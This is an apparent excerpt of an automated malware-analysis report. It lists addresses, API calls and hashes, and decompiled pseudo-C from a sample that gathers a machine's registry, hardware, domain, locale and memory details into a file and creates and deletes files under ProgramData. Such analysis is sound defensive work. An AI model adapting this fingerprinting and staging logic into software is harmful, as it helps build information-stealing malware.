                                                                                                                              0x00420e5e
                                                                                                                              0x00420e6b
                                                                                                                              0x00420e74
                                                                                                                              0x00420e7b
                                                                                                                              0x00420e88
                                                                                                                              0x00420e91
                                                                                                                              0x00420e9f
                                                                                                                              0x00420eb7
                                                                                                                              0x00420ebf
                                                                                                                              0x00420ec8
                                                                                                                              0x00420ed6
                                                                                                                              0x00420eed
                                                                                                                              0x00420efa
                                                                                                                              0x00420f11
                                                                                                                              0x00420f17
                                                                                                                              0x00420f25
                                                                                                                              0x00420f39
                                                                                                                              0x00420f3f
                                                                                                                              0x00420f4d
                                                                                                                              0x00420f61
                                                                                                                              0x00420f67
                                                                                                                              0x00420f74
                                                                                                                              0x00420f88
                                                                                                                              0x00420f8e
                                                                                                                              0x00420f9c
                                                                                                                              0x00420fa2
                                                                                                                              0x00420faf
                                                                                                                              0x00420fb7
                                                                                                                              0x00420fc5
                                                                                                                              0x00420fcd
                                                                                                                              0x00420fdb
                                                                                                                              0x00420fe3
                                                                                                                              0x00420ff0
                                                                                                                              0x00420ff8
                                                                                                                              0x00421006
                                                                                                                              0x0042100e
                                                                                                                              0x0042101c
                                                                                                                              0x00421024
                                                                                                                              0x00421031
                                                                                                                              0x00421042
                                                                                                                              0x00421051
                                                                                                                              0x00421060
                                                                                                                              0x0042106f
                                                                                                                              0x0042107e
                                                                                                                              0x0042108b
                                                                                                                              0x00421097
                                                                                                                              0x00421098
                                                                                                                              0x004210a7
                                                                                                                              0x004210ad
                                                                                                                              0x004210b9
                                                                                                                              0x004210be
                                                                                                                              0x004210c8
                                                                                                                              0x004210e2
                                                                                                                              0x004210f3
                                                                                                                              0x004210ff
                                                                                                                              0x00421105
                                                                                                                              0x0042110d
                                                                                                                              0x00421113
                                                                                                                              0x0042111a
                                                                                                                              0x00421135
                                                                                                                              0x0042113b
                                                                                                                              0x0042114a
                                                                                                                              0x00421150
                                                                                                                              0x00421159
                                                                                                                              0x0042115f
                                                                                                                              0x00421166
                                                                                                                              0x00421175
                                                                                                                              0x00421183
                                                                                                                              0x0042118a
                                                                                                                              0x0042118d
                                                                                                                              0x0042118d
                                                                                                                              0x0042118d
                                                                                                                              0x0042118d
                                                                                                                              0x00421195
                                                                                                                              0x004211a8
                                                                                                                              0x004211b7
                                                                                                                              0x004211bd
                                                                                                                              0x004211cb
                                                                                                                              0x004211d3
                                                                                                                              0x004211e6
                                                                                                                              0x004211f2
                                                                                                                              0x004211f7
                                                                                                                              0x00421201
                                                                                                                              0x0042120d
                                                                                                                              0x00421212
                                                                                                                              0x00421226
                                                                                                                              0x00421237
                                                                                                                              0x00421243
                                                                                                                              0x00421249
                                                                                                                              0x00421251
                                                                                                                              0x00421257
                                                                                                                              0x0042125e
                                                                                                                              0x00421279
                                                                                                                              0x0042127f
                                                                                                                              0x0042128e
                                                                                                                              0x00421294
                                                                                                                              0x0042129d
                                                                                                                              0x004212a3
                                                                                                                              0x004212aa
                                                                                                                              0x004212b9
                                                                                                                              0x004212bf
                                                                                                                              0x004212c7
                                                                                                                              0x004212ca
                                                                                                                              0x004212ce
                                                                                                                              0x004212d1
                                                                                                                              0x004212d1
                                                                                                                              0x004212d1
                                                                                                                              0x004212d1
                                                                                                                              0x004212d3
                                                                                                                              0x004212d9
                                                                                                                              0x004212e5
                                                                                                                              0x004212f4
                                                                                                                              0x004212fa
                                                                                                                              0x00421302
                                                                                                                              0x00421308
                                                                                                                              0x0042130f
                                                                                                                              0x00421324
                                                                                                                              0x0042132a
                                                                                                                              0x00421331
                                                                                                                              0x0042133a
                                                                                                                              0x0042133f
                                                                                                                              0x0042133f
                                                                                                                              0x00421349
                                                                                                                              0x00421351
                                                                                                                              0x00421358
                                                                                                                              0x00421365
                                                                                                                              0x0042136b
                                                                                                                              0x00421372
                                                                                                                              0x00421378
                                                                                                                              0x0042137f
                                                                                                                              0x00421385
                                                                                                                              0x0042138b
                                                                                                                              0x00421391
                                                                                                                              0x00421398
                                                                                                                              0x0042139e
                                                                                                                              0x004213a5
                                                                                                                              0x004213ab
                                                                                                                              0x004213b1
                                                                                                                              0x004213b7
                                                                                                                              0x004213be
                                                                                                                              0x004213cb
                                                                                                                              0x004213d3
                                                                                                                              0x004213e0
                                                                                                                              0x004213e8
                                                                                                                              0x004213f0
                                                                                                                              0x004213f1
                                                                                                                              0x004213ff

                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 00420C1F
                                                                                                                              • _memset.LIBCMT ref: 00420C35
                                                                                                                              • _memset.LIBCMT ref: 00420C4B
                                                                                                                              • _memset.LIBCMT ref: 00420C61
                                                                                                                              • _memset.LIBCMT ref: 00420C77
                                                                                                                              • _memset.LIBCMT ref: 00420C8D
                                                                                                                              • _memset.LIBCMT ref: 00420CA3
                                                                                                                              • _memset.LIBCMT ref: 00420CB9
                                                                                                                              • _memset.LIBCMT ref: 00420CCF
                                                                                                                              • _memset.LIBCMT ref: 00420CE5
                                                                                                                              • _memset.LIBCMT ref: 00420CFB
                                                                                                                              • _memset.LIBCMT ref: 00420D11
                                                                                                                              • _memset.LIBCMT ref: 00420D27
                                                                                                                              • _memset.LIBCMT ref: 00420D3D
                                                                                                                              • _memset.LIBCMT ref: 00420D53
                                                                                                                              • _memset.LIBCMT ref: 00420D69
                                                                                                                              • _memset.LIBCMT ref: 00420D7F
                                                                                                                                • Part of subcall function 00421620: _memset.LIBCMT ref: 00421634
                                                                                                                                • Part of subcall function 00421620: _strcpy_s.LIBCMT ref: 00421653
                                                                                                                                • Part of subcall function 00421620: _memset.LIBCMT ref: 0042168E
                                                                                                                              • wsprintfA.USER32 ref: 00420DBD
                                                                                                                              • wsprintfA.USER32 ref: 00420DDA
                                                                                                                              • wsprintfA.USER32 ref: 00420DF7
                                                                                                                              • wsprintfA.USER32 ref: 00420E14
                                                                                                                              • wsprintfA.USER32 ref: 00420E31
                                                                                                                              • wsprintfA.USER32 ref: 00420E4E
                                                                                                                              • wsprintfA.USER32 ref: 00420E6B
                                                                                                                              • wsprintfA.USER32 ref: 00420E88
                                                                                                                              • lstrcat.KERNEL32(?,02330560), ref: 00420E9F
                                                                                                                                • Part of subcall function 0041A580: _malloc.LIBCMT ref: 0041A58A
                                                                                                                                • Part of subcall function 0041A580: GetTickCount.KERNEL32 ref: 0041A59B
                                                                                                                                • Part of subcall function 0041A580: _rand.LIBCMT ref: 0041A5C4
                                                                                                                                • Part of subcall function 0041A580: wsprintfA.USER32 ref: 0041A5E0
                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00420EB7
                                                                                                                              • wsprintfA.USER32 ref: 00420ED6
                                                                                                                              • wsprintfA.USER32 ref: 00420EFA
                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00420F11
                                                                                                                              • lstrcat.KERNEL32(?,023358D0), ref: 00420F25
                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00420F39
                                                                                                                              • lstrcat.KERNEL32(?,02331528), ref: 00420F4D
                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00420F61
                                                                                                                              • lstrcat.KERNEL32(?,02335888), ref: 00420F74
                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00420F88
                                                                                                                              • lstrcat.KERNEL32(?,02337E30), ref: 00420F9C
                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 00421042
                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 00421051
                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 00421060
                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0042106F
                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0042107E
                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 0042108B
                                                                                                                                • Part of subcall function 0041EBD0: _memset.LIBCMT ref: 0041EBF8
                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 004210A7
                                                                                                                                • Part of subcall function 00424F00: _memset.LIBCMT ref: 00424F0F
                                                                                                                                • Part of subcall function 00424F00: lstrcat.KERNEL32(C:\\ProgramData\\300337377349991,004210BE), ref: 00424F20
                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 004210C8
                                                                                                                                • Part of subcall function 00422460: __mbstowcs_l.LIBCMTD ref: 00422593
                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?), ref: 004211B7
                                                                                                                              • SetCurrentDirectoryA.KERNEL32(02330560,0042A088,02331538,?,?,?,?,?,?,?,?,?), ref: 004212D9
                                                                                                                              • SetCurrentDirectoryA.KERNEL32(02330560,?,?,?,?,?,?,?,?,?), ref: 00421358
                                                                                                                              • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00421365
                                                                                                                              • DeleteFileA.KERNEL32(02331438,?,?,?,?,?,?,?,?,?), ref: 00421372
                                                                                                                              • DeleteFileA.KERNEL32(02331460,?,?,?,?,?,?,?,?,?), ref: 0042137F
                                                                                                                              • DeleteFileA.KERNEL32(02331488,?,?,?,?,?,?,?,?,?), ref: 0042138B
                                                                                                                              • DeleteFileA.KERNEL32(023314B0,?,?,?,?,?,?,?,?,?), ref: 00421398
                                                                                                                              • DeleteFileA.KERNEL32(023314D8,?,?,?,?,?,?,?,?,?), ref: 004213A5
                                                                                                                              • DeleteFileA.KERNEL32(02331500,?,?,?,?,?,?,?,?,?), ref: 004213B1
                                                                                                                              • DeleteFileA.KERNEL32(023315C0,?,?,?,?,?,?,?,?,?), ref: 004213BE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$Directory$lstrcatwsprintf$DeleteFile$Current$Create$CountRemoveTick__mbstowcs_l_malloc_rand_strcpy_s
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3016932189-0
                                                                                                                              • Opcode ID: cbfad0e375860adb4d06db9ddde89303de32c4b1c5cf1502787c92192467c048
                                                                                                                              • Instruction ID: 7bf28244e14e6d77cc8870e9b1224398cc7b19c98e316186366d6ff2b1321c67
                                                                                                                              • Opcode Fuzzy Hash: cbfad0e375860adb4d06db9ddde89303de32c4b1c5cf1502787c92192467c048
                                                                                                                              • Instruction Fuzzy Hash: 2F22DA72D00219ABDB14EBA0ED45EDA73B8BF58304F0445EAF109A7191DFB49B88CF65
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041FC30, Relevance: 76.8, APIs: 51, Instructions: 339COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 22%
                                                                                                                              			E0041FC30(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* __ebp;
				intOrPtr _t56;
				void* _t57;
				void* _t61;
				void* _t69;
				void* _t81;
				void* _t85;
				void* _t89;
				void* _t93;
				void* _t97;
				void* _t104;
				void* _t108;
				void* _t120;
				void* _t135;
				void* _t151;

				_t210 = __esi;
				_t209 = __edi;
				_t155 = __ebx;
				_t56 = E004055AB( *0x432608,  *0x4321d0); // executed
				_v8 = _t56;
				_t266 = _v8;
				if(_v8 != 0) {
					_push( *0x432600);
					_push(_v8);
					E004055C2(__ebx, __edi, __esi, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(__ebx, __edi, __esi, _t266);
					_t61 = E0041B260(); // executed
					_push(_t61);
					_push( *0x43236c);
					_push(_v8);
					E004055C2(__ebx, __edi, __esi, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push(E0041B220(_v8));
					_push( *0x432494);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t69 = E0041B1E0(); // executed
					_push(_t69);
					_push( *0x432694);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push(E0041B2E0());
					_push( *0x432550);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push(E0041ABD0(_t155, _t209, _t210));
					_push( *0x43214c);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t81 = E0041B0E0(); // executed
					_push(_t81);
					_push( *0x43248c);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t85 = E0041B160(); // executed
					_push(_t85);
					_push( *0x4321f8);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t89 = E0041B570(); // executed
					_push(_t89);
					_push( *0x43242c);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t93 = E0041B500(); // executed
					_push(_t93);
					_push( *0x432508);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t97 = E0041AA60(_t155, _t209, _t210); // executed
					_push(_t97);
					_push( *0x4320a4);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push( *0x432564);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t104 = E0041B460(); // executed
					_push(_t104);
					_push( *0x4325c8);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t108 = E0041B4E0(); // executed
					_push(_t108);
					_push( *0x432558);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push(E0041B090());
					_push( *0x43258c);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push(E0041AF50());
					_push( *0x432104);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t120 = E0041B340(_t155, _t209, _t210); // executed
					_push(_t120);
					_push( *0x4321cc);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push(E0041AC40());
					_push( *0x43215c);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push( *0x43228c);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push(E0041B610(_t155,  *0x43228c, _t209, _t210, 0));
					_push( *0x432374);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t135 = E0041AFE0(_t155,  *0x432374, _t209, _t210); // executed
					_push(_t135);
					_push( *0x432310);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push( *0x432348);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push( *0x432198);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push( *0x432538);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push( *0x4320d8);
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E004055C2(_t155, _t209, _t210, _t266);
					_t151 = E0041AC90(_t155, _t209, _t210); // executed
					_push(_t151);
					_push(_v8); // executed
					E004055C2(_t155, _t209, _t210, _t266); // executed
					_push(_v8); // executed
					E00405EA3(_t155, _v8, _t209, _t210, _t266); // executed
				}
				_t57 = E0041A9D0(); // executed
				return _t57;
			}



















                                                                                                                              0x0041fc30
                                                                                                                              0x0041fc30
                                                                                                                              0x0041fc30
                                                                                                                              0x0041fc41
                                                                                                                              0x0041fc49
                                                                                                                              0x0041fc4c
                                                                                                                              0x0041fc50
                                                                                                                              0x0041fc5c
                                                                                                                              0x0041fc60
                                                                                                                              0x0041fc61
                                                                                                                              0x0041fc69
                                                                                                                              0x0041fc71
                                                                                                                              0x0041fc72
                                                                                                                              0x0041fc7a
                                                                                                                              0x0041fc7f
                                                                                                                              0x0041fc86
                                                                                                                              0x0041fc8a
                                                                                                                              0x0041fc8b
                                                                                                                              0x0041fc93
                                                                                                                              0x0041fc9b
                                                                                                                              0x0041fc9c
                                                                                                                              0x0041fca9
                                                                                                                              0x0041fcb0
                                                                                                                              0x0041fcb4
                                                                                                                              0x0041fcb5
                                                                                                                              0x0041fcbd
                                                                                                                              0x0041fcc5
                                                                                                                              0x0041fcc6
                                                                                                                              0x0041fcce
                                                                                                                              0x0041fcd3
                                                                                                                              0x0041fcda
                                                                                                                              0x0041fcde
                                                                                                                              0x0041fcdf
                                                                                                                              0x0041fce7
                                                                                                                              0x0041fcef
                                                                                                                              0x0041fcf0
                                                                                                                              0x0041fcfd
                                                                                                                              0x0041fd04
                                                                                                                              0x0041fd08
                                                                                                                              0x0041fd09
                                                                                                                              0x0041fd11
                                                                                                                              0x0041fd19
                                                                                                                              0x0041fd1a
                                                                                                                              0x0041fd27
                                                                                                                              0x0041fd2e
                                                                                                                              0x0041fd32
                                                                                                                              0x0041fd33
                                                                                                                              0x0041fd3b
                                                                                                                              0x0041fd43
                                                                                                                              0x0041fd44
                                                                                                                              0x0041fd4c
                                                                                                                              0x0041fd51
                                                                                                                              0x0041fd58
                                                                                                                              0x0041fd5c
                                                                                                                              0x0041fd5d
                                                                                                                              0x0041fd65
                                                                                                                              0x0041fd6d
                                                                                                                              0x0041fd6e
                                                                                                                              0x0041fd76
                                                                                                                              0x0041fd7b
                                                                                                                              0x0041fd82
                                                                                                                              0x0041fd86
                                                                                                                              0x0041fd87
                                                                                                                              0x0041fd8f
                                                                                                                              0x0041fd97
                                                                                                                              0x0041fd98
                                                                                                                              0x0041fda0
                                                                                                                              0x0041fda5
                                                                                                                              0x0041fdac
                                                                                                                              0x0041fdb0
                                                                                                                              0x0041fdb1
                                                                                                                              0x0041fdb9
                                                                                                                              0x0041fdc1
                                                                                                                              0x0041fdc2
                                                                                                                              0x0041fdca
                                                                                                                              0x0041fdcf
                                                                                                                              0x0041fdd6
                                                                                                                              0x0041fdda
                                                                                                                              0x0041fddb
                                                                                                                              0x0041fde3
                                                                                                                              0x0041fdeb
                                                                                                                              0x0041fdec
                                                                                                                              0x0041fdf4
                                                                                                                              0x0041fdf9
                                                                                                                              0x0041fe00
                                                                                                                              0x0041fe04
                                                                                                                              0x0041fe05
                                                                                                                              0x0041fe0d
                                                                                                                              0x0041fe15
                                                                                                                              0x0041fe16
                                                                                                                              0x0041fe24
                                                                                                                              0x0041fe28
                                                                                                                              0x0041fe29
                                                                                                                              0x0041fe31
                                                                                                                              0x0041fe39
                                                                                                                              0x0041fe3a
                                                                                                                              0x0041fe42
                                                                                                                              0x0041fe47
                                                                                                                              0x0041fe4e
                                                                                                                              0x0041fe52
                                                                                                                              0x0041fe53
                                                                                                                              0x0041fe5b
                                                                                                                              0x0041fe63
                                                                                                                              0x0041fe64
                                                                                                                              0x0041fe6c
                                                                                                                              0x0041fe71
                                                                                                                              0x0041fe78
                                                                                                                              0x0041fe7c
                                                                                                                              0x0041fe7d
                                                                                                                              0x0041fe85
                                                                                                                              0x0041fe8d
                                                                                                                              0x0041fe8e
                                                                                                                              0x0041fe9b
                                                                                                                              0x0041fea2
                                                                                                                              0x0041fea6
                                                                                                                              0x0041fea7
                                                                                                                              0x0041feaf
                                                                                                                              0x0041feb7
                                                                                                                              0x0041feb8
                                                                                                                              0x0041fec5
                                                                                                                              0x0041fecc
                                                                                                                              0x0041fed0
                                                                                                                              0x0041fed1
                                                                                                                              0x0041fed9
                                                                                                                              0x0041fee1
                                                                                                                              0x0041fee2
                                                                                                                              0x0041feea
                                                                                                                              0x0041feef
                                                                                                                              0x0041fef6
                                                                                                                              0x0041fefa
                                                                                                                              0x0041fefb
                                                                                                                              0x0041ff03
                                                                                                                              0x0041ff0b
                                                                                                                              0x0041ff0c
                                                                                                                              0x0041ff19
                                                                                                                              0x0041ff20
                                                                                                                              0x0041ff24
                                                                                                                              0x0041ff25
                                                                                                                              0x0041ff2d
                                                                                                                              0x0041ff35
                                                                                                                              0x0041ff36
                                                                                                                              0x0041ff44
                                                                                                                              0x0041ff48
                                                                                                                              0x0041ff49
                                                                                                                              0x0041ff51
                                                                                                                              0x0041ff59
                                                                                                                              0x0041ff5a
                                                                                                                              0x0041ff6c
                                                                                                                              0x0041ff73
                                                                                                                              0x0041ff77
                                                                                                                              0x0041ff78
                                                                                                                              0x0041ff80
                                                                                                                              0x0041ff88
                                                                                                                              0x0041ff89
                                                                                                                              0x0041ff91
                                                                                                                              0x0041ff96
                                                                                                                              0x0041ff9d
                                                                                                                              0x0041ffa1
                                                                                                                              0x0041ffa2
                                                                                                                              0x0041ffaa
                                                                                                                              0x0041ffb2
                                                                                                                              0x0041ffb3
                                                                                                                              0x0041ffc1
                                                                                                                              0x0041ffc5
                                                                                                                              0x0041ffc6
                                                                                                                              0x0041ffce
                                                                                                                              0x0041ffd6
                                                                                                                              0x0041ffd7
                                                                                                                              0x0041ffe5
                                                                                                                              0x0041ffe9
                                                                                                                              0x0041ffea
                                                                                                                              0x0041fff2
                                                                                                                              0x0041fffa
                                                                                                                              0x0041fffb
                                                                                                                              0x00420009
                                                                                                                              0x0042000d
                                                                                                                              0x0042000e
                                                                                                                              0x00420016
                                                                                                                              0x0042001e
                                                                                                                              0x0042001f
                                                                                                                              0x0042002d
                                                                                                                              0x00420031
                                                                                                                              0x00420032
                                                                                                                              0x0042003a
                                                                                                                              0x00420042
                                                                                                                              0x00420043
                                                                                                                              0x0042004b
                                                                                                                              0x00420050
                                                                                                                              0x00420054
                                                                                                                              0x00420055
                                                                                                                              0x00420060
                                                                                                                              0x00420061
                                                                                                                              0x00420066
                                                                                                                              0x00420069
                                                                                                                              0x00420071

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 004055AB: __fsopen.LIBCMT ref: 004055B8
                                                                                                                              • _fprintf.LIBCMT ref: 0041FC61
                                                                                                                              • _fprintf.LIBCMT ref: 0041FC72
                                                                                                                                • Part of subcall function 004055C2: __lock_file.LIBCMT ref: 00405609
                                                                                                                                • Part of subcall function 004055C2: __stbuf.LIBCMT ref: 0040568D
                                                                                                                                • Part of subcall function 004055C2: __output_l.LIBCMT ref: 0040569D
                                                                                                                                • Part of subcall function 004055C2: __ftbuf.LIBCMT ref: 004056A7
                                                                                                                                • Part of subcall function 0041B260: RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?), ref: 0041B291
                                                                                                                                • Part of subcall function 0041B260: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,000000FF), ref: 0041B2B5
                                                                                                                              • _fprintf.LIBCMT ref: 0041FC8B
                                                                                                                              • _fprintf.LIBCMT ref: 0041FC9C
                                                                                                                              • _fprintf.LIBCMT ref: 0041FCB5
                                                                                                                              • _fprintf.LIBCMT ref: 0041FCC6
                                                                                                                              • _fprintf.LIBCMT ref: 0041FCDF
                                                                                                                              • _fprintf.LIBCMT ref: 0041FCF0
                                                                                                                                • Part of subcall function 0041B2E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041B30B
                                                                                                                              • _fprintf.LIBCMT ref: 0041FD09
                                                                                                                              • _fprintf.LIBCMT ref: 0041FD1A
                                                                                                                                • Part of subcall function 0041ABD0: _memset.LIBCMT ref: 0041ABFA
                                                                                                                              • _fprintf.LIBCMT ref: 0041FD33
                                                                                                                              • _fprintf.LIBCMT ref: 0041FD44
                                                                                                                                • Part of subcall function 0041B0E0: RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?), ref: 0041B111
                                                                                                                                • Part of subcall function 0041B0E0: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,000000FF), ref: 0041B135
                                                                                                                              • _fprintf.LIBCMT ref: 0041FD5D
                                                                                                                              • _fprintf.LIBCMT ref: 0041FD6E
                                                                                                                                • Part of subcall function 0041B160: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041B17A
                                                                                                                              • _fprintf.LIBCMT ref: 0041FD87
                                                                                                                              • _fprintf.LIBCMT ref: 0041FD98
                                                                                                                                • Part of subcall function 0041B570: DsRoleGetPrimaryDomainInformation.NETAPI32(00000000,00000001,?), ref: 0041B584
                                                                                                                              • _fprintf.LIBCMT ref: 0041FDB1
                                                                                                                              • _fprintf.LIBCMT ref: 0041FDC2
                                                                                                                                • Part of subcall function 0041B500: NetWkstaGetInfo.NETAPI32(00000000,00000064,00000000), ref: 0041B527
                                                                                                                              • _fprintf.LIBCMT ref: 0041FDDB
                                                                                                                              • _fprintf.LIBCMT ref: 0041FDEC
                                                                                                                                • Part of subcall function 0041AA60: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041AB23
                                                                                                                                • Part of subcall function 0041AA60: _memset.LIBCMT ref: 0041AB90
                                                                                                                              • _fprintf.LIBCMT ref: 0041FE05
                                                                                                                              • _fprintf.LIBCMT ref: 0041FE16
                                                                                                                              • _fprintf.LIBCMT ref: 0041FE29
                                                                                                                              • _fprintf.LIBCMT ref: 0041FE3A
                                                                                                                                • Part of subcall function 0041B460: RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?), ref: 0041B491
                                                                                                                                • Part of subcall function 0041B460: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,000000FF), ref: 0041B4B5
                                                                                                                              • _fprintf.LIBCMT ref: 0041FE53
                                                                                                                              • _fprintf.LIBCMT ref: 0041FE64
                                                                                                                                • Part of subcall function 0041B4E0: GetSystemInfo.KERNEL32(?), ref: 0041B4EA
                                                                                                                              • _fprintf.LIBCMT ref: 0041FE7D
                                                                                                                              • _fprintf.LIBCMT ref: 0041FE8E
                                                                                                                              • _fprintf.LIBCMT ref: 0041FEA7
                                                                                                                              • _fprintf.LIBCMT ref: 0041FEB8
                                                                                                                              • _fprintf.LIBCMT ref: 0041FED1
                                                                                                                              • _fprintf.LIBCMT ref: 0041FEE2
                                                                                                                                • Part of subcall function 0041B340: _memset.LIBCMT ref: 0041B381
                                                                                                                                • Part of subcall function 0041B340: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 0041B39A
                                                                                                                                • Part of subcall function 0041B340: __aulldiv.LIBCMT ref: 0041B3B7
                                                                                                                                • Part of subcall function 0041B340: GlobalMemoryStatus.KERNEL32 ref: 0041B414
                                                                                                                              • _fprintf.LIBCMT ref: 0041FEFB
                                                                                                                              • _fprintf.LIBCMT ref: 0041FF0C
                                                                                                                              • _fprintf.LIBCMT ref: 0041FF25
                                                                                                                              • _fprintf.LIBCMT ref: 0041FF36
                                                                                                                              • _fprintf.LIBCMT ref: 0041FF49
                                                                                                                              • _fprintf.LIBCMT ref: 0041FF5A
                                                                                                                              • _fprintf.LIBCMT ref: 0041FF78
                                                                                                                              • _fprintf.LIBCMT ref: 0041FF89
                                                                                                                                • Part of subcall function 0041AFE0: _memset.LIBCMT ref: 0041B025
                                                                                                                                • Part of subcall function 0041AFE0: GetTimeZoneInformation.KERNEL32(00000000), ref: 0041B034
                                                                                                                              • _fprintf.LIBCMT ref: 0041FFA2
                                                                                                                              • _fprintf.LIBCMT ref: 0041FFB3
                                                                                                                              • _fprintf.LIBCMT ref: 0041FFC6
                                                                                                                              • _fprintf.LIBCMT ref: 0041FFD7
                                                                                                                              • _fprintf.LIBCMT ref: 0041FFEA
                                                                                                                              • _fprintf.LIBCMT ref: 0041FFFB
                                                                                                                              • _fprintf.LIBCMT ref: 0042000E
                                                                                                                              • _fprintf.LIBCMT ref: 0042001F
                                                                                                                              • _fprintf.LIBCMT ref: 00420032
                                                                                                                              • _fprintf.LIBCMT ref: 00420043
                                                                                                                                • Part of subcall function 0041AC90: _memset.LIBCMT ref: 0041ACB5
                                                                                                                                • Part of subcall function 0041AC90: RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,00000000), ref: 0041AD12
                                                                                                                              • _fprintf.LIBCMT ref: 00420055
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _fprintf$_memset$Open$InfoQueryValue$GlobalInformationMemoryStatus$ComputerCurrentDomainLocaleNamePrimaryProfileRoleSystemTimeWkstaZone__aulldiv__fsopen__ftbuf__lock_file__output_l__stbuf
                                                                                                                              • String ID:
